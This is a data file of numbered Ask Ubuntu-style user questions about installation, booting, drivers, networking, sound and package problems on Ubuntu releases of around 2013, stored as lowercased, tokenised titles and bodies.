351349	ubuntu will not install on my sata 74gb ( main ) hd , but tries to install on a 4gb seagate ( 2nd hd ) why ?	i have a sata 74 gb hd with windows xp installed , tried to install ubuntu 13.04 on it but ubuntu only sees the 4gb seagate on the adaptec card , so it keeps stating the partitions are to small . i unplugged the seagate to see if this would force ubuntu to install on the 74gb sata but ubuntu installation window comes up blank when it get to the install/partition window . anyone know how to get ubuntu to recognize the sata hd ?
351351	trying to load 64 bit ubuntu 12.04 from a live usb . get the message 'boot error ' , then skips my usb and boots from my hard drive	so i ca n't get grub to load . the computer posts as normal , then tries to boot from the usb . i get the error message . computer wo n't move from there unless you press a key . i 've also tried version 13.04 . i 've been in the bios looking for usb settings that might be interfering , but have found nothing . running an amd fx-4100 processor in this board : gigabyte ga-78lmt-usb3 am3+ amd 760g hdmi usb 3.0 micro atx amd motherboard . the usb bootstick was created from within 32-bit ubuntu 12.04 , which runs normally on my computer . i 've used multiple usb ports , including the usb 3.0 and 2.0 ports .
351353	making a ubuntu pedrive into a regular pendrive	i have weird question with a simple answer , but i 'm to lazy for simple . ( that was a joke ) . i have two desktopss and a 32 gig pendrive with ubuntu 12.04 installed . my old desktop is ancient , i 'd planned on giving it away . to make a long story short , i wiped the harddrive of the old pc , and now i want to recover some lost files using puppy linux and photorec ( i think that the name of the software ) . you need a place to store the recovered files , and the only thing i have available is the pendrive . is it possible to copy all the files ( everything not just media ) to my new desktop . afterwards , i would use the pendrive as the storage space for the recovered files . finally , after transferring the recovered files to a new location , i would transfer the 12.04 files back to the pendrive . i know that was confusing and overall , kind of ridiculous . it would be much easier just to buy a new jump drive or external harddrive , but the closest electronic store is 20 minutes away . also , i do n't want to spend money on something i 'm not going to use often . i know i promised a short story ; i apologize . thans in advance .
351358	deja dup - recovering backup file for encrypted archive	i have setup my deja dup backup job to use aes256 , as noted in this previous question below : how can i make deja dup use aes 256 as the encryption algorithm ? my concern is as follows : if i copy these backup archives to another machine , can i simple restore them if i know the password to the archives , or do i also need a copy of the gnupg key i generate with gnupg -- gen-key at decryption/restore time ? thank you .
351359	how do i add my samsung laptop 's volume keys ?	i have a samsung np355v5c , and just installed ubuntu gnome . when i try to bind the volume keys , the keyboard settings do not recognise the keys . how do i restore these keys ?
351361	invisible mouse	when i boot ubuntu i can see the mouse cursor at the login screen but once i put my password is see this error could not acquire name on session bus i tried to google the error but all i find is stuff on vnc and i do n't use vnc . i do have teamviewer if that matters . after the error message i get the desktop but the mouse cursor is invisible . i 'll explain how i got here . i wanted to upgrade to 13.10 to see if my recon3d sound card would work . but when i tried to upgrade i got could not calculate the upgrade and then the update software would close . i read an article saying i needed to run the following command before so i did . sudo apt-get update & & sudo apt-get dist-upgrade while it was running the pc froze and had to do a hard reset . after that i could n't boot i was getting an error saying something about filesystem and failed to mount . i fixed that by googling the error . but then i got news problems . first i was getting unable to load session ubuntu . i got around that somehow by reinstalling some things like desktop-ubunut , xorg , etc but now i 'm at this point where in lightdm it boots and i get low graphics mode then the error message could not acquire name on session bus and the invisible mouse cursor . my googling my issue i found stuff about the greeter and something about renaming xauthority to .old which i did but not sure what to do now or what to try . i do n't know how to rollback to 13.04 or if it would help . i would like to reinstall everything but ca n't without losing my 2tb of movies . i use 4 500gb hdds in raid 0 for a total of 2tb . i read you could reinstall ubuntu over itself but that tells me it will delete everything even if i did n't check format . i heard you could reinstall ubuntu package by package but dunno how to do that . please help me !
351362	install apache2-dev in ubuntu 13.04 ?	i try to install apache2-dev in this command : sudo apt-get install apache2-dev but it said : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package apache2-dev that seems the is no package apache2-dev ? i 'm using ubuntu 13.04
351364	using preinstalled hp applications on ubuntu	my laptop came with hp programs that i like using . how or can , i use those application on ubuntu ?
351367	how would i display the lines that do not have certain letters ?	how would i display the lines that do not contain certain letters ? this is what i have already tried unsuccessfully to show the lines that do not consist of an a or b : egrep * [ ^ab ] * filename
351372	can not access gui after update	i just updated ubuntu 12.04.3 and when i rebooted the computer it only boots into a text only mode . a black screen that asks for my login details . when i login it stays in a text only mode , like a giant terminal window . i cant access the gui at all . i think it may be a problem with graphics card drivers ? please help meas i 'm wondering if i have to a total reinstall and lose all of my data .
351374	configure error	root @ ubuntu : /home/mase/downloads/soft/netmate-da-1-0-2/netmate # ./configure checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking target system type ... i686-pc-linux-gnu [ ... ] checking readline/readline.h usability ... yes checking readline/readline.h presence ... yes checking for readline/readline.h ... yes checking readline/history.h usability ... yes checking readline/history.h presence ... yes checking for readline/history.h ... yes checking for readline in -lreadline ... no **configure : error : can not find libreadline**
351378	ubuntu 13 wifi connection problem	i ca n't connect to wifi . i tried ifconfig wlan0 but it shows wlan0 : error fetching interface information : device not found ... my laptop is compaq presario cq40 . please help me . thank you !
351379	help me setup my new build !	background : linux user for about 2 years more of a gui guy than a terminal guy , but i can sudo apt-get install program-name do n't know how to compile or install from .zip/tar files . if there are menus i 'm good . i use ubuntustudio , prefer xfce as it 's faster and do n't like desktop effects . i just purchased these parts to make my first ever build : http : //pcpartpicker.com/p/1hcyb my first priority is video editing with kdenlive . light gaming on the side . my concerns : this will be my first experience with ssd for the os . is there anything different i need to do with setup ? i will also have a 1tb storage drive . is it better to have the os on the ssd and the home folder on the storage drive or have it all on the ssd ? is this new graphics card plug and play ? or will i have to compile drivers ? does anyone recommend any specific settings when installing ubuntustudio on the new system ? sorry if the questions sound dumb . i have 4 more days until the new parts come in so i would like to be as prepared as i can be . thank you for any and all help !
351382	adb and fastboot in ubuntu on arm	is it possible to get adb and fastboot for android working in ubuntu running on the arm samsung chromebook under crouton ? i 'm having no luck finding an answer .
351383	ubuntu 12.04 lts dual boot with windows 7 wifi stops working after suspend , keep requesting authentication after reconnecting attempts	i am using an hp pavilion dv7 laptop that has wifi driver : intel ( r ) centrio ( r ) wireless-n6150 ( if you are not sure where i got this , it is in the `` device manager '' / `` network adapter '' / . you need to boot windows 7 to see it . ) when the computer just start , wifi was working perfectly but then after a suspend , it keeps trying to connect and requesting authenticaiton without establishing a connection . i have logged into ubuntu and tried to create a file that tell system to unload and load the wifi adapters but that did n't work . gksudo gedit /etc/pm/config.d/config suspend_modules= '' iwlwifi '' the code above did n't do anything after i reboot and tested with a suspend . i am not sure if the `` n6150 '' wireless driver name found in windows 7 has anything to do with this ? but i just used `` iwlwifi '' as that was printed in the terminal for the name of the wifi network drive . ( that 's `` mn-tool '' ) i also tried to reset the adapter by terminal but that did n't even fix the problem . ( that 's rmod and modprobe ) ... so if you guys have any tips on how to fix this problem , please help . i guess the simplest solution is to not having the computer suspend at all . but that is actually going to hurt your battery in the longrun , and heat up your computer , which potentially could dammage your hardwares . ( i wonder if logging off or switching users without suspend would make this problem too or not ... . )
351384	how to get the windows blue screen os selection menu ?	how do i get windows blue screen os selection menu ? http : //apcmag.com/images/2012/dual_boot_windows8_linux.jpg i have already installed windows 8 and ubuntu 13.04
351387	cant boot into ubuntu anymore	i closed my laptop lid ( the screen ) that was running ubuntu . next time i tried to reboot i got the error ubuntu\winboot\wubildr.mbr missing or corrupt its a dual boot windows 7 and ubuntu , now i cant boot into either windows nor ubuntu . i ran the boot repair that i saw mentioned in the ubuntu site , it said it was successful , but the problem still exists . i have valuable data i been working on for a year on the ubuntu , so i cant just re-install over it . anybody have an idea how i can fix this problem ? thank you .
351388	how to disable the caplock ?	just installed 13.10 , and the one of the first things i always do in a new install , is to disable capslock . but i ca n't find the keyboard options anymore ?
351392	change location of default folders editing user-dirs.dirs ?	i have ubuntu 12.04 . i tried to change the location of default folders ( documents , music , ... ) to other disk ( ntfs-formatted ) . i tried to change the file ./config/user-dirs.dirs . however , after reboot the changes in user-dirs.dirs disappear . for example , to change my desktop folder i wrote : xdg_desktop_dir= '' /media/datos/juanvi/escritorio '' note : escritorio is desktop in spanish . maybe i can not move the default folders to ntfs partitions ?
351394	`` gnome-control-center network '' problem crashing	every time i want to go back to system setting menu from network menu by clicking all settings , the dialog box disappears . the network is working fine , just the hyperlink to the system settings is crashing . from appearance and the others are fine . i try to check this by typing in terminal ~ $ gnome-control-center network ( gnome-control-center:27628 ) : gtk-warning ** : overriding tab label for notebook ( gnome-control-center:27628 ) : gtk-warning ** : overriding tab label for notebook ( gnome-control-center:27628 ) : gtk-warning ** : overriding tab label for notebook when i click all settings , it gets segmentation fault ( core dumped ) and the network dissapears . what is wrong with this ? can someone help me fix this ?
351399	can not start hadoop dameon services	on my imac , i could run the bin/start-all.sh , and would then start the services by jps command earlier . now when i run bin/start-all..sh it shows me starting namenode , starting job tracker etc.but when i type jps , it gives me some random number and jps , n nothing else ... i wonder what is the problem ?
351400	deleting contents of ~/.local/share/trash/expunged ... .. ?	is there a safe way of deleting contents of ~/.local/share/trash/expunged ? i see it has lots of files & folders i had deleted -- from the trash as well . they are taking a lot of disc space . after deleting the files & clearing the trash why are the files still there ? i have n't tried it yet but is it ok to manually delete them ? sudo rm -rv ~/.local/share/trash/expunged
351401	install i386 package on armhf system ?	is it possible ? and if yes , how to install them properly ?
351402	unable to boot : grub rescue : operating system not found	unknowingly i partitioned the system while using windows 7 . everything was fine until i restart my computer , but now it shows grub rescue screen . i also do n't have live cd for linux . so , i tried with windows 7 from usb drive but i got this in screen 'operating system not found ' . if i try with ls ( hd0,2 ) /boot it shows unknown filesystem . can you please help me out ?
351403	permission denied while making a file without asking for password	i 'm trying to create a file using cat > list but each time it shows me `` permission denied '' . xyz @ jaishreeram : /home $ sudo cat > list bash : l : permission denied xyz @ jaishreeram : /home $ sudo cat > list bash : l : permission denied
351404	nvidia gtx 765m with optimus unclamed	i have tried alot of different ways to get my pc working with graphics card but hasnt got me anywhere . i started off with installing ubuntu 12.04 for the first time which left me stuck at black login screen . ( solved now ) . i have tried bubmlebee method and installing driver from nvidia directly but both didnt work . ( iâve got removed nvidia* now since it didnt work ) with bumblebee i could not run optirun or prium lspci -nn | grep -i vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 4th gen core processor integrated graphics controller [ 8086:0416 ] ( rev 06 ) sudo lshw -c display *-display unclaimed description : 3d controller product : gk106m [ geforce gtx 765m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f6000000-f6ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff *-display description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:45 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) lspci | grep nvidia 01:00.0 3d controller : nvidia corporation gk106m [ geforce gtx 765m ] ( rev a1 ) ps : i used http : //followthegeeks.com/a-noobs-guide-to-installing-nvidia-optimus-driver-in-ubuntu/ to solve black screen problem .
351406	nginx on ubuntu server in virtualbox on windows 7 , how to access localhost:8080	i have nginx running on ubuntu server ( guest ) in virtualbox on windows 7 ( host ) i need to access the nginx webserver 's localhost . i 'm assuming there 's no way to do this directly from ubuntu server 's terminal , because i probably need a browser to do this and there 's no browser there . so , i need to access the nginx webserver 's localhost from the host 's browser . how do i configure nat port-forwarding on virtualbox to accomplish this ?
351407	trouble pointing ktorrent to samba share	i 'm using k-torrent and i want to point my downloads to a samba share that i have set up on a separate server . i can connect to the share from ubuntu and watch movies etc . but if i copy the location and try to use it in k torrent , i 'm prompted for the password but it does n't take it . a picture says a thousand words so here 's what i 'm dealing with on the left , you can see i 'm connected to the share and i 've added a shortcut . on the right , i 've copied the location in to ktorrent and it 's prompting me for a password . if i enter it , the box will just blink and prompt me again . also , if i click on 'samba shares ' in ktorrent , it ca n't find any and that it could be a possible firewall issue but , obviously , i 've already connected to it ... any suggestions ?
351410	sudo is not working	my sudo is not working . how to fix ? i am using 13.04 . i searched through google over an hour and have n't found anything effective . sudo -i sudo : effective uid is not 0 , is sudo installed setuid root ?
351414	how to compile .deb file from package archives ?	how do i make .deb package file from these archives ? http : //ppa.launchpad.net/unit3/bfgminer/ubuntu/dists/quantal/main/
351419	problem to open google in firefox .	i have mts dongle . i have configured my dongle to ubuntu mobile broadband . i can successfully connected to the network . i have checked by ping of ip on terminal . but i am enable to connect the google by using default browser i.e . mozilla firefox . i am using ubuntu 13.04 latest version . can you please help me ?
351421	ubuntu 13.04 no sound	after my last restart the sound is not working ... i tried this script , but i do n't know how to read the output and how to fix the problem . i tried this too , but it does n't work . what 's wrong ? it 's not hardware related since it works on windows 8 . moreover , while trying all that , i 've lost the sound-settings widget on the top-bar . and my sound output has turned to dummy !
351422	programs in different desktop environments	i have a question which might be defined as a `` nooby '' one . do programs that work on ubuntu 13.04 unity necessarily work on other desktop environments ( such as lubuntu ) ? and by programs i mean ... well , programs and packages and all that . i do n't want trouble with my printer/scanner and all that .
351425	merge ubuntu and windows partitions	on my computer there are windows and ubuntu ( the hard drive is divided ) . can i delete windows and connect it hard disk space join ubuntu ? if `` yes '' = > how ?
351426	backspace in vi editor in ubuntu12.04.2 lts does n't work	as we know that vi editor has three modes namely : command mode , input mode & ex mode.by default , we get the command mode when the editor is evoked . also we can navigate to other modes by using suitable commands like `` i '' , '' : '' etc . my problem is that when i press backspace in input mode , it does n't erase the character unlike in the same editor that i have worked in redhat does . i want to be clear about it .
351434	lubuntu booting from pen drive	eee pc asus 101ch failed hard drive i am using lubuntu on a pen drive . how do i make this system boot up every time from pendrive . i have to press esc or f2 to change boot order every time . setup in f2 does not hold settings to boot from lubuntu . advice please and i like lubuntu .
351437	i have a 1 tb harddisk ( internal ) , but only the 205 gb volume shows up	i read a few posts related to this , and performed the following action in terminal : sudo fdisk -l i got the following result after putting that : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0005b7bf device boot start end blocks id system /dev/sda1 * 2048 400001023 199999488 83 linux /dev/sda2 400003070 1953523711 776760321 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 1937029120 1953523711 8247296 82 linux swap / solaris /dev/sda6 400003072 800002047 199999488 83 linux /dev/sda7 800004096 1937020927 568508416 83 linux partition table entries are not in disk order can anybody help me on how do i get my entire 1000.2 gb usable ? i am a new ubuntu user and my computer runs only ubuntu . it is a lenovo z580 with core i7 3rd generation .
351439	ibus can not input chinese punctuation after system update	i 'm using 12.04 . the ibus daemon is started with -x -d. originally i can switch between full size punctuation such as ，。︰ etc and half size ( , . : ) using shift+space after updating yesterday this fails . shift+space still allows me to switch between full-size and half-size for english characters ｌｉｋｅ ｔｈｉｓ １ , but no longer works for all punctuation `~ ! @ # $ % , . < > // ? : '' { } [ ] [ ''-=_+ < > i can still type these characters using complicated stroke combination ( e.g . zxad in cangjie for。 ) but i can not type it directly using shift+space how to fix this ? the following are the updates i installed yesterday , not sure whether they are related : linux ( 3.2.0.53.63 , 3.2.0.54.64 ) libgnutls-openssl27 ( 2.12.14-5ubuntu3.4 , 2.12.14-5ubuntu3.5 ) libgnutls26 ( 2.12.14-5ubuntu3.4 , 2.12.14-5ubuntu3.5 ) libgnutls26 ( 2.12.14-5ubuntu3.4 , 2.12.14-5ubuntu3.5 ) libgnutlsxx27 ( 2.12.14-5ubuntu3.4 , 2.12.14-5ubuntu3.5 ) linux-image ( 3.2.0.53.63 , 3.2.0.54.64 ) linux-headers-generic ( 3.2.0.53.63 , 3.2.0.54.64 ) linux-image-generic ( 3.2.0.53.63 , 3.2.0.54.64 ) rsyslog ( 5.8.6-1ubuntu8.4 , 5.8.6-1ubuntu8.5 ) linux-libc-dev ( 3.2.0-53.81 , 3.2.0-54.82 ) libgnutls-dev ( 2.12.14-5ubuntu3.4 , 2.12.14-5ubuntu3.5 )
351440	how to create a personalized install cd/pendrive of ubuntu according to my needs ? ( remastersys is no more )	i have read many such similar questions , but they do n't satisfy my needs because they are outdated now currently i have a desktop with ubuntu 12.10 installed on it.i would be using this desktop for few more months . i have already installed a lot of software on this pc.soon , when i would be getting a new laptop , i wish to install ubuntu from a personalized cd/ pen drive so that i wo n't have to waste a lot of data usage and time on re downloading the softwares . also i wish to make some changes in the core structure itself ( because it 's easy , i think ) . remastersys was a good option , but now it dead . i would use a .iso file or the installation itself to do this job .
351442	is it better to choose nvidia 's proprietary drivers ( 319 ) by ubuntu repo over bumblebee ?	i 'm using ubuntu 12.04.3 lts on my dell xps l502x laptop . i freshly installed ubuntu on my system yesterday . i want to know that is it safe & better now if i choose nvidia drivers over bumblebee , bcz i think they are going to support linux now .
351446	startup programs missing	thanx in advance for solving my problem .i am currently using ubuntu 13.04 but accidently i have removed all my start up programs including the hidden programs also ( means my /etc/xdg/autostart directory is empty ) . now , i am unable to log in my computer . but i am able to login through console mode by pressing the key ctrl+alt+f1 . please solve my problem .
351448	personal settings not working in 12.04.3	at some point recently my system would no longer take any personal settings : wallpaper will not change , settings such as turning off the screen lock will not change when changed . every setting in the settings window is effected - none will change . no errors pop up . i 've searched the forums for this and have not been able to find anything that matches my problem . thanks for any help you can provide ! specifications : ubuntu 12.04.3 desktop asus cm6870
351451	how to use my vimrc file when edit file width sudo command	i found when i use the command sudo vim /etc/www/main.wsgi the vim said : neocomplcache disabled : `` sudo vim '' is detected and $ home is set to your user 's home . you may want to use the sudo.vim plugin , the `` -h '' option with `` sudo '' or set always_set_home in /etc/sudoers instead . press enter or type command to continue and when i enter and edit file , the neocomplcache seems goes wrong function . the i search the google , i found the command vim sudo : /etc/www/main.wsgi but it seems does n't use my own .vimrc configure file . so , what you others to do ?
351456	unable to install ubuntu 13.04 on hcl me	while installing ubuntu 13.04 on my hcl laptop . i am getting error which is `` gpu lookup failed '' . i have tried everything possible . please help me . thank you . let me explain my full problem . after booting when the start screen comes with ubunto logo and some dots flashing .after that instead of showing the option to try or install , there comes the background screen which is also not with proper background but has some distorted marking on it . and after that it remain like this while the cursur canbe moved freely .after 3or5 minute it hangs there and then the black screen comes with message on top saying gpu lookup failed , and it tries again saying starting again it repeats saying that gpu lookup failed . one more thing my laptop is of year 2007 and there is one update for it also in 2010 but i have not updated my bios . could it be the cause .
351460	installation alongside windows xp or dual boot	hi i am new to linux environment . i need to use ubuntu for some software development . ive created the live usb from the iso image . is it possible to use it for development purpose ? if not , i need some help with the installation . my system configuration is intel core 2duo , 1gb ram , 160 hdd , windows xp xp3 . i 've two partitions , one for windows ( 20gb ) another for data ( 120gb ) , i was trying to install ububtu alongside the windows but i do n't want to lose any data . i downloaded the 13.04 version from the site and was trying to install it . after selecting the option of `` install alongside windows '' , its asking to resize the partition . also it is showing the 20gb windows partition second to the 120gb partition where i keep the data . i dont want to use the xp or any of my data . also if you could guide me to where i can get my hands on some of the basic unix commands , i 'll be needing those . thank you .
351462	unexpected shutdown	so i am new to ubuntu , and have installed 12.04 lts version . the only problem i have until now , are unexpected shutdowns . when it happens , it pops up for one second a black screen with sth written on it and then shut down . i think it is because of overheating . i try , on purpose , runned as many programs as possible , to make it shut down again , i also prepared the camera to take a photo of the quick message . i was also checking temperature , via command `` sensors '' in terminal . last check before shutdown was 84째c ( critical is 86 ) . i do n't know how to attach image here , so i have written error below : *checking battery state ... broadcast message from root @ ubuntu ( unknown ) at 11:46 ... the system is going down for power off now ! acpid : exiting checking for running anattended-upgrades : speech-dispatcher disabled : edit /etc/default/speech-dispatcher it is strange , because i have never had unexpected errors in windows 7 . on ubuntu it is happening all the time . computer : medion , akoyap6630 2.66ghz , 4gb ram )
351463	bypass authenticated http proxy : ubuntu	is there any way to bypass authenticated http proxy to something like 127.0.0.1 : port , so that we could use it any application , simply by filling out the proxy 127.0.0.1 : port ( which could be used for applications that do n't have options of filling proxy_username and proxy_passsword ) . i have tried privoxy , but i could make it work only with tor proxy . i am unable to figure out where to fill the proxy and authentication details of my http proxy in the config file . please say if privoxy could help , or if there 's some other alternative p.s . : i know that tor could be a suggestion , but i do n't want to browse anonymously . i just want to bypass my authenticated proxy to unauthenticated one .
351466	bypass proxy in ubuntu	in my hostel there is cyberoam firewall . therefor i am unable to access facebook . i searched also and tried using jellyshell but it takes too much time . is there any option using tor or vpn ? tor browser settings i don`t know .
351467	color picker for entire screen	is there any application that provides a color picker for the screen ? for example : after starting the application the mouse is transformed into a color picker . clicking anywhere on the screen it will detect the pixel color .
351469	another sony vaio question	i have an issue that is similar to others already addressed in this forum so forgive me if it sounds like a repeat question . i 've tried the solutions offered in other threads with little success , so please bear with me . i just purchased a sony vaio svp132a1cw 13 inch ultrabook , 4gb ram , 128 gb ssd , i5 processor . as usual , the unit came with windows 8 which i did n't want to keep so i hooked into a fresh install of ubuntu 13.04 from a usb key . the bootable usb was created using `` startup disk creator '' and it used `` ubuntu-13.04-desktop-amd64.iso '' to complete the task . in the bios , secure boot is disabled , boot mode = legacy and 1st boot priority is internal disk drive ( i did change this during the last install attempt to external device , then changed it back ) . so , i 've had several attempts to install ubuntu , the last two successful to a point . they appeared to go well , but on reboot there were some issues . the main issues are : bootup is slow , almost 5 minutes to reach the login prompt . the purple screen comes up almost immediately , but hangs there for what seems like an eternity . aslo , wireless is not working , nor is it an option in system settings . i 've tried searching for a fix for this issue , but i guess i 'm special as i have n't encountered anyone else ( yet ) with this problem . my cruddy old hp that is 6 years old boots up in under two minutes and it 's ubuntu install was seamless . i do n't want to take the machine back to the dealer but it 's looking like my only option at present . any help will be greatly appreciated .
351476	got error 'grub installation failed ' while installing ubuntu 12.04 lts on windows 8	i have sony vaio with windows-8 . i also want ubuntu 12.04 as my second os . i created 50gb root partition and 4gb swap-area partition . but after some time ( about 2 minute ) while installation i got error : grub installation failed : the grub-efi-amd64-signed package failed to install into /target/ . without the grub boot loader , the installed system will not boot please help me to solve this issue ...
351477	will my ubuntu touch be compatible with samsung galaxy ace ?	i 'm just curious if ubuntu touch will be compatible with my samsung galaxy ace .
351480	how to perform migration using a single machine	is it possible to have two installations of ubuntu 12.04 in the same machine ? ( one old and one fresh ? ) assuming that there is one , then i will install all the necessary packages in the fresh machine and create a ghost file out of it . finally , i will backup all of my files in a hd , format the whole disk based upon the ghost file , transfer my files from the hd , do some further settings , and here i am ! in other words , i want format my laptop , but on my own pace ... is that possible ?
351485	error installing ubuntu software - package dependencies can not be resolved	i switched to ubuntu from windows , but i am not able to install any software on it . whenever i install it gives the following error : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time .
351487	keeping /etc folder on a remote server	i have etckeeper with default configuration ( bazaar as vcs ) . i want to keep this repository on the remote server ( for example on amazon ec2 or , if possible , on dropbox/box.net/ubuntu one ) . i tried to include /etc folder to ubuntu one backup shedule . but the obvious problem is root privileges : some files could not be read and stored without root privileges . so , how do i organize the proccess of keeping my local /etc repository to the remote server ? i thought about cron task , which would zip /etc folder into archive in my /home directory . but it seems to be bad workaround .
351489	gdbus error on bluetooth transfer	i installed ubuntu 12.10 and have complaints regarding bluetooth operation . whenever i try a transfer it shows an error as gdbus error . i installed blueman but yet no improvement .
351490	make ubutu recognize devices automatically without user interaction all the time	my wife and i would like to know if there is a script or a command or a driver or an app ( or combination ) that makes ubuntu behave/emulate windows upnp ; specifically , we would like all our devices to : be recognized all the time without user interaction . if i have to run or install or script something it 's ok as long as it is a one time thing ( example , not having to explicitly `` mount '' a device each time through console ) if we plug an sd card or a pen drive , we 'd like the system to mount it , even if we do n't choose an action at the time we plug it on the computer , regardless of file system . we need our cd roms , hard disks , windows partition and any other media or device available in a file navigation system , and available to browse from applications we 'd like that devices do n't un-mount over time , or upon reboot ; if it 's physically connected , it should be available . when a device is plugged and perhaps drivers are being installed or the device is being configured , we 'd love to see some kind of feedback . ( the first time i inserted an sd card , it was not recognized , after a few inserts and removal and reboot , the system now pops a menu when i insert the card , and recognize it , if it was installing drivers or being configured , i was never notified by the system ) . this might already exist through a setting or configuration we are missing , but we have found nothing on the matter . we often see that cd/dvd roms are not available or visible on the file manager ( i 'm using kubuntu , she 's using ubuntu 13.04 ) . also , some partitions are not available at times . i do n't mind the occasional console command and reboot to get devices working , but my wife has used windows/mac all her life , and while she was incredibly happy with ubuntu 's performance and stability compared to windows , she 's reluctant to go an extra mile for everyday tasks such as having devices available all the time . i 'm happy that she 's willing to try ubuntu , but not having her devices available all the time would make her want to go back to windows . please help , and thanks for your time .
351491	bad keyboard shortcuts	i use ubuntu 12.04 and gnome3 desktop . i have a weird keyboard shortcut setting ( i did n't do anything with keyboard configuration ) . when i press shift+p the terminal opens and after typing shift+w nothing happens - i just ca n't type the capital w and p with shift and this is so unpleasant ! can somebody help me ? thanks !
351492	python : comparing two iterating tables	i do n't know if asking python questions here is right or not but here i got . this thing has me stumped . i have a python script which connects to a mysql db , and takes a table of datetime results , so far so good . within python it then copies that list under another variable list having added 90 days on top of the original list . so now i have two lists : 1 i pulled straight from the db , one that 's the original + 90 days . but what i then need to do is to iterate through the original list , and for each original date compare it to every new date . for example . say i have the original table with dates like this : a , b , c , d , e , f , g ... after the + 90 days i also have a1 , b1 , c1 , d1 , e1 , f1 , g1 . then it has to follow this pattern : compare a to a1 , a to b1 , a to c1 , a to d1 , etc . then , it moves on to comparinng b to a1 , b to b1 , b to c1 etc etc . i thought i 'd nest two for loops , but that had an undesired effect . how would i carry this out ?
351493	i cant find transmisson	i’m really bad with computers and i recently updated my ubuntu i don’t know what to and i cant torrent because it asks me what to open with and i cant find transmission to open torrents with please help . it asks me what to open them with and before the update it used transmission as my default and i cant figure out to set it back as my default . i 've tried finding multiple times and i cant and i don’t know what to do
351494	what 's wrong with wubi install ?	i have a windows 7 32 bit ( home premium ) on my hp laptop . i decided to take the easy way to install ubuntu and that is by using wubi . having gone over a few tutorials on wubi , i decided to let it do its task . i let it install . i saw the ubuntu option during boot and hence i selected it and pressed enter . i saw the ubuntu purple screen and then my screen went black . all the other lights in the laptop were on . the volume rocker , the wifi , power and so on . i let it sit for about 15 mins but since i did not get any response whatsoever , i had to forcefully shut it down . dismissing it as a fluke , i restarted the laptop and repeated the same procedure . i got the same result . well , what made it go wrong ? for now , i have uninstalled it with the hope of reinstalling it once i know what went wrong .
351495	webcamstudio problem in loading its output to flashplayer video sources	i am on ubuntu 13.04 amd64 os and i am having problem with webcamstudio that its output is not loaded to flashplayer web broadcaster video sources . first i installed webcamstudio_0.57beta4_all.deb . it had a problem that of sun-java ( java 6 ) and it was resolved after it was patched with diff_webcamstudio.patch downloaded from its google site . then there was a problem in installing with module webcamstudio not loaded massage . it was resolved after i uninstalled v4l2loopback-dkms v4l2loopback-source v4l2loopback-utils and installed webcamstudio-dkms ( webcamstudio-dkms_0.61-1~getdeb1_all.deb from www.ubuntuupdates.org ) . yet webcamstudio output not loaded to the flashplayer . ( though the activate output stream option ok and given flashplayer permissions to the target site from macromedia site settings ) . but normal laptop webcam is loaded . i installed flashcam from the .deb file downloaded from launchpad . i also followed the guidance given in linuxmint tutorial . finally i uninstalled webcamstudio and reinstalled it with webcamstudio0.57_build217_x64.deb . update : when webcamstudio-dkms is loaded the v4l2loopback-dkms is removed . that channel needs v4l2loopback-dkms . i alreay installed ffmpeg , gstreamer and v4l2 . i am trying to webcast to my channel in www.tikilive.com . there is a screenshot of the web broadcaster : yet i could n't resolve the problem and i seek your kind help .
351499	solution to no ultimately trusted keys found	i tried installing tlp and ubuntu tweak on my new ubuntu ( previously i had the same ubuntu , but reinstalled it ) . when adding their sources , i got the error no ultimately trusted keys found.in the previous installation i did not get these errors .
351502	might anybody have some advice on installing the proprietary nvidia drivers on a macbook 4,1 with a geforce 8600m gt ?	i 've been tearing my hair out trying to get the proprietary nvidia drivers to work with my macbook pro 4,1 . i 've installed 12.04 , upgraded to 12.10 and 13.04 . i 've tried using the gui installer , apt-get via command line , and the nvidia .run installer . i always get the same result . it boots and hangs right before launching lightdm , with a blank screen and a flashing cursor . i 'm fairly new to linux , but know my way around a computer generally . any help would be appreciated ! -jason
351503	unexplainable kernel upgrade to 3.5.x in 12.04 ?	simply doing sudo apt-get update & & sudo apt-get upgrade i ended in one of my work machines with a kernel upgrade to 3.5.0-xx-generic whereas other machines only got to version 3.2.0-54-generic . how is this possible ? how come i see from some machines only version 3.2.0-54-generic ? is the 3.5.0-x-generic some sort of beta version ?
351504	held broken packages in ubuntu 10.04	i was upgrading from ubuntu 10.04 to ubuntu 12.04 but my upgrade paused on libc6-dev for around 2 hours . i rebooted my system and now i 'm getting you have held broken packages . i 've tried looking through other posts but none of the fixes seem to work for me and i just do n't think i know enough to fix it myself . in synaptic package manager i 'm getting e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies i 'm unsure what to do in terminal to try and fix this . i seem to be working fine in 10.04 still but without fixing this i ca n't upgrade to 12.04 .
351508	can not connect bsnl broadband from 12.10	i have a new bsnl broadband connection , which i want to use with 12.10 . it seems to be not working . the lan port indicator does n't light up when i connect it through ethernet . also , when i am trying to use usb , it does n't show the connection . please help . i can connect through tata photon device .
351511	scrollling deceleration like in osx	is it possible in ubuntu with a touchpad 2-finger scrolling ? i do not know how to explain this , but the feeling is like kicking with your foot on a skateboard : when you scroll down a long page - if you do a fast 2-finger movement it keeps scrolling down ( although decelerating ) so you scroll much faster . right now in my ubuntu installation : as soon as your fingers leave the touchpad , the scrolling abruptly stops . osx touchpad behaviour is much more natural in this case .
